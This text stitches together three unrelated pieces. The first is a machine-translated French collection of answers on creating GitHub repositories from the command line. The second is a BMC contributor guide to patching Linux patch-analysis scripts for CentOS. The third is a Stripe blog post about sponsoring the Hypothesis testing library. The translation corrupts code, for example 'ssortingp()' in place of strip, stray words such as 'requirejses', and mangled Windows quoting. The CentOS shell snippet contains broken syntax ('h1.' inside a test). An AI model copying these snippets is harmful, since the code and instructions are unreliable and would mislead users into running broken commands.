MISE À JOUR: J’ai fini par faire fonctionner cela. Je ne sais pas exactement comment reproduire le problème, mais je viens juste de partir de zéro (suppression du dossier .git)
git init git add .emacs git commit -a -m "adding emacs"
Maintenant, cette ligne va créer le repo distant et même le pousser, mais malheureusement je ne pense pas pouvoir spécifier le nom du repo que je voudrais. Je voulais qu’il s’appelle “dotfiles” sur github, mais le gem vient d’utiliser le nom du dossier actuel, qui était “jason” puisque j’étais dans mon dossier personnel. (J’ai ajouté un ticket demandant le comportement souhaité)
gh create-from-local
Cette commande, par contre, accepte un argument pour spécifier le nom du repository à distance, mais il est destiné à démarrer un nouveau projet à partir de zéro, c’est-à-dire qu’après avoir appelé cette commande, vous obtenez un nouveau référentiel distant dans un sous-dossier nouvellement créé par rapport à votre position actuelle, les deux avec le nom spécifié comme argument.
gh create dotfiles
Il est fastidieux de saisir le code complet à chaque fois qu’un référentiel doit être créé.
curl -u 'USER' https://api.github.com/user/repos -d '{"name":"REPO"}' git remote add origin git@github.com:USER/REPO.git git push origin master
Une approche plus simple est:
githubscript.sh githubscript.sh
#!bin/bash curl -u 'YOUR_GITHUB_USER_NAME' https://api.github.com/user/repos -d "{\"name\":\"$1\"}"; git init; git remote add origin git@github.com:YOUR_GITHUB_USER_NAME/$1.git;
NB Ici, $1 est le repository name du repository name transmis en tant argument lors de l’appel du script Modifiez
YOUR_GITHUB_USER_NAME avant d’enregistrer le script.
Définir les permissions requirejses pour le fichier de script chmod 755 githubscript.sh
Incluez le répertoire de scripts dans le fichier de configuration de l’environnement. nano ~/.profile; export PATH="$PATH:$HOME/Desktop/my_scripts"
Définissez également un alias pour exécuter le fichier githubscript.sh. nano ~/.bashrc; alias githubrepo="bash githubscript.sh"
Maintenant, rechargez les .profile .bashrc et .profile dans le terminal. source ~/.bashrc ~/.profile;
Maintenant, pour créer un nouveau référentiel, à savoir une demo : githubrepo demo;
Pour les utilisateurs avec une authentification à deux facteurs, vous pouvez utiliser la solution de bennedich, mais il vous suffit d’append l’en-tête X-Github-OTP pour la première commande. Remplacez CODE par le code fourni par le fournisseur d’authentification à deux facteurs. Remplacez USER et REPO par le nom d’utilisateur et le nom du référentiel, comme vous le feriez dans sa solution.
curl -u 'USER' -H "X-GitHub-OTP: CODE" -d '{"name":"REPO"}' https://api.github.com/user/repos git remote add origin git@github.com:USER/REPO.git git push origin master
J’ai écrit un script astucieux pour cela appelé Gitter en utilisant les API REST pour GitHub et BitBucket:
BitBucket:
gitter -c -rb -l javascript -n node_app
GitHub:
gitter -c -rg -l javascript -n node_app -c = créer un nouveau repository -r = fournisseur de repo (g = GitHub, b = BitBucket) -n = nommer le repo -l = (facultatif) définit la langue de l’application dans le repository
J’ai créé un alias Git pour ce faire, basé sur la réponse de Bennedich . Ajoutez ce qui suit à votre ~/.gitconfig :
[github] user = "your_github_username" [alias] ; Creates a new Github repo under the account specified by github.user. ; The remote repo name is taken from the local repo's directory name. ; Note: Referring to the current directory works because Git executes "!" shell commands in the repo root directory. hub-new-repo = "!python3 -c 'from subprocess import *; import os; from os.path import *; user = check_output([\"git\", \"config\", \"--get\", \"github.user\"]).decode(\"utf8\").ssortingp(); repo = splitext(basename(os.getcwd()))[0]; check_call([\"curl\", \"-u\", user, \"https://api.github.com/user/repos\", \"-d\", \"{{\\\"name\\\": \\\"{0}\\\"}}\".format(repo), \"--fail\"]); check_call([\"git\", \"remote\", \"add\", \"origin\", \"git@github.com:{0}/{1}.git\".format(user, repo)]); check_call([\"git\", \"push\", \"origin\", \"master\"])'"
Pour l’utiliser, lancez
$ git hub-new-repo
depuis n’importe où dans le repository local et entrez votre mot de passe Github lorsque vous y êtes invité.
Basé sur l’autre réponse de @Mechanical Snail, sauf sans l’utilisation de python, que j’ai trouvé extrêmement exagéré. Ajoutez ceci à votre ~/.gitconfig :
[github] user = "your-name-here" [alias] hub-new-repo = "!REPO=$(basename $PWD) GHUSER=$(git config --get github.user); curl -u $GHUSER https://api.github.com/user/repos -d {\\\"name\\\":\\\"$REPO\\\"} --fail; git remote add origin git@github.com:$GHUSER/$REPO.git; git push origin master"
Non, vous devez ouvrir un navigateur au moins une fois pour créer votre username d’ username sur GitHub, une fois créé, vous pouvez utiliser l’API GitHub pour créer des référentiels à partir de la ligne de commande, en suivant la commande suivante:
curl -u 'github-username' https://api.github.com/user/repos -d '{"name":"repo-name"}'
Par exemple:
curl -u 'arpitaggarwal' https://api.github.com/user/repos -d '{"name":"command-line-repo"}'
Pour savoir comment créer un jeton, cliquez ici. Voici la commande que vous allez saisir (à la date de cette réponse. (Remplacez tous les mots-clés CAPS):
curl -u 'YOUR_USERNAME' -d '{"scopes":["repo"],"note":"YOUR_NOTE"}' https://api.github.com/authorizations
Une fois que vous entrez votre mot de passe, vous verrez ce qui suit qui contient votre jeton.
{ "app": { "name": "YOUR_NOTE (API)", "url": "http://developer.github.com/v3/oauth/#oauth-authorizations-api" }, "note_url": null, "note": "YOUR_NOTE", "scopes": [ "repo" ], "created_at": "2012-10-04T14:17:20Z", "token": "xxxxx", "updated_at": "2012-10-04T14:17:20Z", "id": xxxxx, "url": "https://api.github.com/authorizations/697577" }
Vous pouvez révoquer votre jeton à tout moment en allant ici
Ce dont vous avez besoin est hub . Hub est un wrapper de ligne de commande pour git. Il a été conçu pour s’intégrer avec git natif en utilisant des alias. Il essaie de fournir des actions github dans git, y compris la création d’un nouveau référentiel.
→ create a repo for a new project $ git init $ git add . && git commit -m "It begins." $ git create -d "My new thing" → (creates a new project on GitHub with the name of current directory) $ git push origin master
Pour les rubyistes:
gem install githubrepo githubrepo create *reponame*
entrez le nom d’utilisateur et pw à l’invite
git remote add origin *ctrl v* git push origin master
Source: Elikem Adadevoh
Pour des raisons de représentation, je ne peux pas append ceci en tant que commentaire (où il serait préférable de répondre à la réponse de bennedich ), mais pour la ligne de commande Windows, voici la syntaxe correcte:
curl -u YOUR_USERNAME https://api.github.com/user/repos -d “{\” name \ “: \” YOUR_REPO_NAME \ “}”
C’est la même forme de base, mais vous devez utiliser des guillemets (“) au lieu de simples, et échapper les guillemets doubles dans les parameters POST (après l’indicateur -d). J’ai également supprimé les guillemets simples autour de mon nom d’utilisateur. mais si votre nom d’utilisateur avait un espace (possible?), il aurait probablement besoin de guillemets doubles.
Pour tous les utilisateurs de Python 2.7. *. Il y a un wrapper Python autour de l’ API Github qui est actuellement sur la version 3, appelée GitPython . Il suffit d’installer en utilisant easy_install PyGithub ou pip install PyGithub .
from github import Github g = Github(your-email-addr, your-passwd) repo = g.get_user().user.create_repo("your-new-repos-name") # Make use of Repository object (repo)
Les documents d’object du Repository sont ici .
J’ai trouvé cette solution qui m’a plu: https://medium.com/@jakehasler/how-to-create-a-remote-git-repo-from-the-command-line-2d6857f49564
Vous devez d’abord créer un jeton d’access personnel Github
Ouvrez votre fichier ~ / .bash_profile ou ~ / .bashrc dans votre éditeur de texte préféré. Ajoutez la ligne suivante près du haut de votre fichier, où le rest des variables d’exportation sont:
export GITHUB_API_TOKEN=
Quelque part ci-dessous, par vos autres fonctions bash, vous pouvez coller quelque chose de similaire à ce qui suit:
function new-git() { curl -X POST https://api.github.com/user/repos -u :$GITHUB_API_TOKEN -d '{"name":"'$1'"}' }
Maintenant, chaque fois que vous créez un nouveau projet, vous pouvez exécuter la commande $ new-git awesome-repo pour créer un nouveau référentiel distant public sur votre compte utilisateur Github.
Disclamier: Je suis l’auteur du projet open source
Cette fonctionnalité est supscope par: https://github.com/chrissound/LinuxVerboseCommandLib c’est essentiellement ce script:
#!/usr/bin/env bash # Create a repo named by the current directory # Accepts 1 STRING parameter for the repo description # Depends on bin: jq # Depends on env: GITHUB_USER, GITHUB_API_TOKEN github_createRepo() { projName="$(basename "$PWD")" json=$(jq -n \ --arg name "$projName" \ --arg description "$1" \ '{"name":$name, "description":$description}') curl -u "$GITHUB_USER":"$GITHUB_API_TOKEN" https://api.github.com/user/repos -d "$json" git init git remote add origin git@github.com:"$GITHUB_USER"/"$projName".git git push origin master };
voici mes commandes git initiales (éventuellement, cette action a lieu dans C:/Documents and Settings/your_username/ ):
mkdir ~/Hello-World # Creates a directory for your project called "Hello-World" in your user directory cd ~/Hello-World # Changes the current working directory to your newly created directory touch blabla.html # create a file, named blabla.html git init # Sets up the necessary Git files git add blabla.html # Stages your blabla.html file, adding it to the list of files to be committed git commit -m 'first committttt' # Commits your files, adding the message git remote add origin https://github.com/username/Hello-World.git # Creates a remote named "origin" pointing at your GitHub repository git push -u origin master # Sends your commits in the "master" branch to GitHub
J’ai récemment découvert create-github-repo . Du readme:
Installer:
$ npm i -g create-github-repo
Usage:
$ export CREATE_GITHUB_REPO_TOKEN= $ create-github-repo --name "My coolest repo yet!"
Ou:
$ create-github-repo --name "My coolest repo yet!"
créer un nouveau référentiel sur la ligne de commande
echo "# " >> README.md git init git add README.md git commit -m "first commit" git remote add origin https://github.com/**/**.git git push -u origin master
pousser un référentiel existant à partir de la ligne de commande
git remote add origin https://github.com/**/**.git git push -u origin master
|
How to get the VPC to recognize non supported RPM-based Distros
Contributor content
This topic was created by a BMC Contributor and has not been approved. More information.
This has been tested in the 7.6.0 VPC and tested on later application server versions. In 8.x the VPC has been removed for Linux patching, as RedHat, SLES and OEL support was rolled into the product as Patch Catalogs. However, these catalogs are inflexible and will not work with distros like CentOS, Fedora. OpenSuSE or any other RPM-based distro. While these distros are typically unsupported by the RSCD agent, the agent typically functions OK.
The examples below cover modifying the VPC for CentOS, but a similar procedure should work for other distros.
This is completely unsupported by BMC. It is recommended that you make backups of any files that you are making changes to and systems that you are going to test this on. You may not be able to get this to work.
Overview
We need to do two main things here. We need to tell the VPC how to identify the distro (CentOS), and we need to tell the VPC how to get the version or release of the distro. Luckily, this information is stored in a text file that is consistent for each distro. This is how the VPC figures out that RHEL is RHEL and SuSE is SuSE. For 8.x application servers we need to install the VPC and then add the Linux VPC bits back, and they will use the common VPC framework that the VPC Installer lays down.
Install the VPC
On 7.6 install the VPC and the latest VPC patch normally. You must install the perl-XML-Parser module on the application server and the RedHat helper system (where the repo is kept). Also, java must be installed on your helper system. The openjdk that ships with RHEL 5 is fine.
8.x VPC
Installation
On 8.x, install the VPC and choose 'HP-UX'. Let the installer finish.
Apply the latest VPC patch.
Grab the 7.6 VPC and 7.6 VPC hotfixes.
In the patch-contentdirectory, unzip thepatchanalysis.zipfile.
Copy the linuxpudirectory to the 8.x VPC install path, eg/opt/bmc/BladeLogic/8.1/NSH/patch
Unzip the 7.6 VPC Hotfix into a temporary directory. Copy any files in the linuxpudirectory to the 8.x VPC install path (overwriting what you just extracted from the 7.6 VPC)
Copy the SupportFiles/RedHatRepositoryManager.zipfile to theSupportFilesdirectory in the install path, eg_ /opt/bmc/BladeLogic/8.1/NSH/patch/SupportFiles_
On UNIX, run the command chown -R bladmin:bladmin /opt/bmc/BladeLogic/8.0/NSH/patch/linuxpu
8.x VPC File Modifications
Comment out any lines in the following files that contain blcli.setAuthenticationType("BLSSO") or jli.setAuthenticationType("BLSSO") or_ jli.setAppServerHost(appserver)_ or blcli.setAppServerHost(hostname)
linuxpu/Scripts/Jython/linux-analysis.py
linuxpu/Scripts/Jython/get_blds_path.py
linuxpu/Scripts/Jython/loadAndDeployPatches.jli
In 8.1 and beyond, update the java class paths that are referenced in the following files:
linuxpu/Scripts/Jython/solpatch.py
linuxpu/Scripts/Jython/sharedPayload.py
linuxpu/Scripts/Jython/linux-analysis.py
For example, we find com.bladelogic.shared.comm in the linuxpu/Scripts/Jython/solpatch.jy. We need to change that to: com.bladelogic.om.infra.shared.comm. Insert a om.infra after any occurance of com.bladelogic.
Change the bl_yum="/opt/bladelogic/blyum" line in linuxpu/Work/linux-anayze.sh and linuxpu/Work/linux-deploy.sh to:
bl_yum="`cat /usr/lib/rsc/HOME`/bin/blyum"
Common File Modifications
There are 3 files to modify here:
<OM>/patch/linuxpu/Scripts/Perl/linuxpc.pl
<OM>/patch/linuxpu/Scripts/Jython/linux-analysis-py
<OM>/patch/linuxpu/Work/linux-analyze.sh
linuxpc.pl
In the linuxpc.pl file find the section around line 700 that looks like:
if ( !( system_cmd("nexec $host 'sh -c \"test -f $redhat_relfile\"'") ) )
{
$os_vendor = "redhat";
$os_rel_file = $redhat_relfile;
}
if ( !( system_cmd("nexec $host 'sh -c \"test -f $suse_relfile\"'") ) )
{
$os_vendor = "suse";
$os_rel_file=$suse_relfile;
}
We need to tell the VPC how to figure out that this is CentOS. This can be done with an nexec to look for a particular RPM that should only exist on a CentOS system. The new section looks like:
if ( !( system_cmd("nexec $host 'sh -c \"test -f $redhat_relfile\"'") ) )
{
$os_vendor = "redhat";
$os_rel_file = $redhat_relfile;
}
if ( !( system_cmd("nexec $host 'sh -c \"test -f $suse_relfile\"'") ) )
{
$os_vendor = "suse";
$os_rel_file=$suse_relfile;
}
if ( !( system_cmd("nexec $host 'sh -c \"rpm -q centos-release\"'") ) )
{
$os_vendor = "cent";
$os_rel_file=$redhat_relfile;
}
Next we need to tell the VPC how to figure out the release of CentOS. Around line 720 there is a section that reads the version out of the /etc/redhat-release file. The CentOS file is in a different order than RedHat so we need to pull the release number from a different location in the line. The original section looks like this:
my @a = split( " ", $os_relstring );
if($os_vendor eq "redhat"){
$os_version = $a[6];
}elsif($os_vendor eq "suse") {
$os_version = $a[4];
}
$os_version=~s/.//gi;
$os_version =~ s/AS//g;
The modified version looks like this:
my @a = split( " ", $os_relstring );
if($os_vendor eq "redhat"){
$os_version = $a[6];
}elsif($os_vendor eq "suse") {
$os_version = $a[4];
}elsif($os_vendor eq "cent") {
$os_version = $a[2];
$os_version = int $os_version;
}
$os_version=~s/..*//gi;
$os_version =~ s/AS//g;
We're pulling the version from the 3rd position (array position 0 is the 1st position) here instead of the 7th or 4th.
The last modification is done to pull the name of the distribution from the /etc/redhat-release file. The original code block around line 770 looks like this:
if($os_relstring=~/Red Hat Linux Advanced Server release/gi){
$os_relstring='RHAS';
}elsif($os_relstring=~/Red Hat Enterprise Linux ES release/gi){
$os_relstring='RHES';
}elsif($os_relstring=~/Red Hat Enterprise Linux Server release/gi){
$os_relstring='RHES';
}elsif($os_relstring=~/SUSE LINUX Enterprise Server/gi){
$os_relstring='SLES';
}elsif($os_relstring=~/Red Hat Enterprise Linux AS release/gi){
$os_relstring='RHAS';
}elsif($os_relstring=~/Enterprise Linux Enterprise Linux AS release/gi){
$os_relstring='OELAS';
}elsif($os_relstring=~/Enterprise Linux Enterprise Linux Server release/gi){
$os_relstring='OELES';
}else{
display_err("($host) Unsupported Linux Release $os_relstring");
display_err("($host) Skipping this host");
print "($host) Exit Code 1n";
return 0;
}
We need to add a new section for CentOS based on the /etc/redhat-release file. The file contains something like
CentOS release 5.2 (Final)
so the 'release string' should be 'CentOS release'. The new section looks like:
...
}elsif($os_relstring=~/Enterprise Linux Enterprise Linux AS release/gi){
$os_relstring='OELAS';
}elsif($os_relstring=~/Enterprise Linux Enterprise Linux Server release/gi){
$os_relstring='OELES';
}elsif($os_relstring=~/CentOS release/gi){
$os_relstring='COS';
}else{
display_err("($host) Unsupported Linux Release $os_relstring");
display_err("($host) Skipping this host");
print "($host) Exit Code 1n";
return 0;
}
Note: In 7.6, after you modify this file, you must overwrite the file in the Depot with this file. You can copy it over the file in <FS>/storage/scripts or you can cut and paste the contents into the file in the CM GUI. In 8.x we will be adding this to the depot later so you do not need to do anything yet.
linux-analysis.py
In this file we need to do something similar to what we did in the perl script above. First is the distribution name around line 450:
if os_relstr.count('Enterprise Linux Enterprise Linux Server release'):
os_release='OELES';
if not os_release:
print_error('Cannot resolve OS Release from /etc/redhat-release on host %s' %host)
We only need to add a line for CentOS:
if os_relstr.count('Enterprise Linux Enterprise Linux Server release'):
os_release='OELES';
if os_relstr.count('CentOS release'):
os_release='COS';
if not os_release:
print_error('Cannot resolve OS Release from /etc/redhat-release on host %s' %host)
Then we need to handle the version around line 460:
temp = os_relstr.split(' ')
if os_release == 'SLES': ver_indx = 4
else: ver_indx = 6
os_version = temp[ver_indx].strip()
if not os_version:
print_error('Cannot resolve OS Version from /etc/redhat-release on host %s' %host)
print_error('Skipping host %s' %host)
With the CentOS check, it looks like:
temp = os_relstr.split(' ')
if os_release == 'SLES': ver_indx = 4
if os_release == 'COS': ver_indx = 2
else: ver_indx = 6
os_version = temp[ver_indx].strip()
os_version = os_version.split(".")[0]
if not os_version:
print_error('Cannot resolve OS Version from /etc/redhat-release on host %s' %host)
print_error('Skipping host %s' %host)
In 8.2 you need to modify a blcli call as a command was removed. Around line 230 find:
ret = blcli.run(['Job', 'getAssociatedInstanceBean'])
if not ret.success():
sys.stderr.write(str(ret.getError())+"\n")
sys.exit(1)
job_timeout = ret.returnValue.getFullyResolvedPropertyValueAsString('JOB_TIMEOUT')
job_part_timeout = ret.returnValue.getFullyResolvedPropertyValueAsString('JOB_PART_TIMEOUT')
job_timeout = str(int(job_timeout)*timeout_percentage/100)
job_part_timeout = str(int(job_part_timeout)*timeout_percentage/100)
change this to
job_timeout = blcli.run(['Job', 'getPropertyValueAsString', 'JOB_TIMEOUT']).returnValue
job_part_timeout = blcli.run(['Job', 'getPropertyValueAsString', 'JOB_PART_TIMEOUT']).returnValue
job_timeout = str(int(job_timeout)*timeout_percentage/100)
job_part_timeout = str(int(job_part_timeout)*timeout_percentage/100)
linux-analyze.sh
Again, we need to identify the CentOS name. Around line 145 we have:
release="RHAS"
return 0
fi
echo "$os_rel_str" | grep -qi "Enterprise Linux Enterprise Linux Server release"
if ["$?" "0"]; then
release="RHES"
return 0
fi
return 1
}
This needs an addition:
release="RHAS"
return 0
fi
echo "$os_rel_str" | grep -qi "Enterprise Linux Enterprise Linux Server release"
if ["$?" h1. "0"]; then
release="RHES"
return 0
fi
echo "$os_rel_str" | grep -qi "CentOS release"
if ["$?" "0"]; then
release="COS"
return 0
fi
return 1
}
linuxrepo.conf
The new shorthand identifier we've chosen is COS. Therefore in the linuxrepo.conf we should have a line like:
cos5=//blapp/u01/patch/cos53,COS5x86
That creates a repo tag for CentOS 5, stored in /u01/patch/cos53 on the server named 'blapp' for the x86 architecture. For x86_64 you would have something like:
cos5x64=//blapp/u01/patch/cos53,COS5x86_64
Creating NSH Scripts and NSH Script Jobs for 8.x
In the TrueSight Server Automation Workspace, create folders for the Linux VPC. You should already have folders for HPUX or AIX depending on what was installed as required previously. You can do this manually, or use this script:
#!/bin/nsh
blcli_setoption serviceProfileName defaultProfile
blcli_setoption roleName BLAdmins
blcli_connect
if [ `uname -s` = "WindowsNT" ]
then
RSC="/C/Windows/rsc/HOME"
else
RSC="/usr/lib/rsc/HOME"
fi
scriptLocation="`cat ${RSC}`/patch"
createDepotFolders()
{
# Depot Folders
blcli_execute DepotGroup createGroupWithParentName "Linux Patch Analysis" "/Patch Analysis Items"
blcli_execute DepotGroup addPermission "/Patch Analysis Items/Linux Patch Analysis" "Everyone" 'DepotFolder.*'
blcli_execute DepotGroup createGroupWithParentName "Patches" "/Patch Analysis Items/Linux Patch Analysis"
blcli_execute DepotGroup addPermission "/Patch Analysis Items/Linux Patch Analysis/Patches" "Everyone" 'DepotFolder.*'
blcli_execute DepotGroup createGroupWithParentName "BLPackages" "/Patch Analysis Items/Linux Patch Analysis/Patches"
blcli_execute DepotGroup addPermission "/Patch Analysis Items/Linux Patch Analysis/Patches/BLPackages" "Everyone" 'DepotFolder.*'
blcli_execute DepotGroup createGroupWithParentName "Scripts" "/Patch Analysis Items/Linux Patch Analysis"
blcli_execute DepotGroup addPermission "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Everyone" 'DepotFolder.*'
}
createJobFolders()
{
# Job Folders
blcli_execute JobGroup createGroupWithParentName "Linux Patch Analysis" "/Patch Analysis Jobs"
blcli_execute JobGroup addPermission "/Patch Analysis Jobs/Linux Patch Analysis" "Everyone" 'JobFolder.*'
blcli_execute JobGroup createGroupWithParentName "Patch Analysis Jobs" "/Patch Analysis Jobs/Linux Patch Analysis"
blcli_execute JobGroup addPermission "/Patch Analysis Jobs/Linux Patch Analysis/Patch Analysis Jobs" "Everyone" 'JobFolder.*'
blcli_execute JobGroup createGroupWithParentName "Patch Deploy Jobs" "/Patch Analysis Jobs/Linux Patch Analysis"
blcli_execute JobGroup addPermission "/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs" "Everyone" 'JobFolder.*'
blcli_execute JobGroup createGroupWithParentName "Deploy" "/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs"
blcli_execute JobGroup addPermission "/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs/Deploy" "Everyone" 'JobFolder.*'
}
createNSHScript()
{
# NSH Scripts
blcli_execute NSHScript addNSHScriptToDepotByGroupName "/Patch Analysis Items/Linux Patch Analysis/Scripts" 3 "${scriptLocation}/linuxpu/Scripts/Perl/linuxpc.pl" "Linux Patch Analysis" "Linux Patch Analysis"
}
setScriptOptions()
{
# NSH Scripts Options
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "hosts" "Target servers to analyze" "f" "%f" "3"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "local directory" "Scripts directory" "w" "${scriptLocation}/linuxpu/Work" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Linux Patch Repository" "Linux Patch Repository" "l" "UPDATE-AFTER-INSTALL" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Analysis Type" "Analysis Type. Default to repo" "a" "repo" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "script mode" "ap- for Analysis and Packaging and Creation of deploy jobs, a - for only analyis and p - for Only Packaging and delpoy job creation" "m" "ap" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Depot Patch Folder Name" "Depot Patch Folder Name to store patches" "D" "/Patch Analysis Items/Linux Patch Analysis/Patches" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Deploy Job Folder Name" "Deploy Job Folder Name to store Deploy Jobs" "J" "/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Package exclude file" "NSH path to file (one package name per line) of packages to exclude from analysis." "e" "" "5"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "URL_TYPE" "URL Type" "T" "AGENT_COPY_AT_STAGING" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Network URL" "ftp/http URLs to the yummified Patch Repository" "U" "" "5"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Policy Name" "Policy Name" "P" "Linux Patch Analysis" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Debug Mode" "Debug Mode (0/1)" "d" "0" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Auto-Execute Deploy Batch Job" "Enable/disable Auto-Execute Deploy Batch Job." "X" "0" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Multi Data Store mode" "Enable/Disable Multi Data Store mode(0/1)" "b" "0" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Shared Payload mode" "Enable/Disable Shared Payload mode(0/1)" "S" "0" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Max number of targets to process in parallel per platform" "Max number of targets to process in parallel per platform" "p" "10" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Update only flag" "Update only flag" "u" "1" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Errata Based Analysis" "Errata Based Analysis" "E" "0" "7"
}
createScriptJob()
{
# NSH Script Job
blcli_execute NSHScriptJob createNSHScriptJob "/Patch Analysis Jobs/Linux Patch Analysis/Patch Analysis Jobs" "Linux Patch Analysis Job" "Linux Patch Analysis" "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "`hostname`" 30
blcli_execute NSHScriptJob getDBKeyByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis/Patch Analysis Jobs" "Linux Patch Analysis Job"
blcli_storeenv jobKey
blcli_execute Job clearTargetServers ${jobKey}
blcli_execute NSHScriptJob createNSHScriptJob "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes" "Apply Return Codes" "/Patch Analysis Items" "Apply Return Codes" "`hostname`" 30
blcli_execute NSHScriptJob getDBKeyByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes"
blcli_storeenv jobKey
blcli_execute Job clearTargetServers ${jobKey}
}
setJobOptions()
{
# NSH Script Options
blcli_execute NSHScriptJob addNSHScriptParameterValueByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes" 1 "Linux"
blcli_execute NSHScriptJob addNSHScriptParameterValueByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes" 2 "/Patch Analysis Items/Linux Patch Analysis/Patches"
blcli_execute NSHScriptJob addNSHScriptParameterValueByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes" 3 "%f"
}
createEO()
{
blcli_execute ExtendedObjectClass createExtendedObject "Linux Patch Analysis Results" "Linux Patch Analysis" "perl \"${scriptLocation}/linux_cust.pl\" '??TARGET.NAME??'" csv.gm Linux false
}
createDepotFolders
createJobFolders
createNSHScript
setScriptOptions
createScriptJob
setJobOptions
createEO
Workspace Folders
Depot:
/Patch Analysis Items/Linux Patch Analysis
/Patch Analysis Items/Linux Patch Analysis/Patches
/Patch Analysis Items/Linux Patch Analysis/Patches/BLPackages
/Patch Analysis Items/Linux Patch Analysis/Scripts
Jobs:
/Patch Analysis Jobs/Linux Patch Analysis
/Patch Analysis Jobs/Linux Patch Analysis/Patch Analysis Jobs
/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs
/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs/Deploy
NSH Script and Script Job Creation
Create a new NSH Script object in the Depot Workspace /Patch Analysis Items/Linux Patch Analysis/ScriptsnamedLinux Patch Analysisusing thelinuxpc.plscript.
This should be a Type 4script (Execute the script using the PERL interpreter...)
Create the following options on the nsh script
The -woption should match your install directory
The -loption should contain the repositories defined in thelinuxrepo.conffile
The -Poption should be the "Policy Name" that you want to show up in Reporting.
The
Extended Object
To view the VPC results, you must manually create the Extended Object in the Configuration Object Dictionary.
Change the path to match your particular installation path.
Create the Repository
Getting the files
The RedHatDownload Manager will not download CentOS or other RPMS. It will however yummify the repositories just fine.
There are some options to download the repos:
Manually use rsync or wget or some other tool to pull the RPMS from a mirror on the internet.
Use a tool like mrepo http://dag.wieers.com/home-made/yam to manage the repo
Yummify the Repo
Copy the RedhatRepositoryManager.zip from the <install>/patch/SupportFiles directory to your RedHat helper system. Extract this somewhere on the system. Make sure your java executable is in your path.
After you download the repos you must run the RedHatRepositoryManager -yummifyrepo against the repo, the VPC creates its own custom metadata files that are separate from the standard files that createrepo generates (they are named differently but contain the same content). For example if your repository is stored in /u01/patch/cos53 you would runRedHatRepositoryManager -yummifyrepo -repoLocation /u01/patch/cos53.
|
In September, Stripe is supporting the development of Hypothesis, an open-source testing library for Python created by David MacIver. Hypothesis is the only project we’ve found that provides effective tooling for testing code for machine learning, a domain in which testing and correctness are notoriously difficult.
Instead of unit tests, Hypothesis lets you define certain properties of your functions that should hold true for every input. A property is a statement like “My sorting function should return a sorted list given any input list.” Every time the tests run, Hypothesis attempts to prove your properties wrong by feeding in thousands of automatically generated example inputs. If any of your properties break, Hypothesis returns the smallest possible example of failing input.
Here’s an example of a Hypothesis test:
from hypothesis import given
import hypothesis.strategies as st
@given(st.lists(st.integers()))
def test_reversing_twice_gives_same_list(xs):
# This will generate lists of arbitrary length (usually between
# 0 and 100 elements) whose elements are integers.
ys = list(xs)
ys.reverse()
ys.reverse()
assert xs == ys
This style of testing is a perfect match for machine learning workflows. We use machine learning to make products like Radar, which helps hundreds of thousands of Stripe users fight fraud at a global scale, more effective. Testing machine learning code is especially critical when your systems can have material consequences for users. Every day, we train many models on large datasets, but unit tests alone can’t capture all of the complexity of the possible input data. For the past few months we’ve been using Hypothesis to generate input data for our tests of the models behind Radar.
While working with Hypothesis, we found that support for property-based testing with Pandas and NumPy wasn’t built out. We’re excited to support the project in making concrete progress towards integrating with these two foundational, commonly-used libraries in Python’s ML toolkit.
We plan to use Hypothesis more broadly at Stripe and hope that the project’s development over the next few months also helps other companies reliably integrate machine learning into more products.
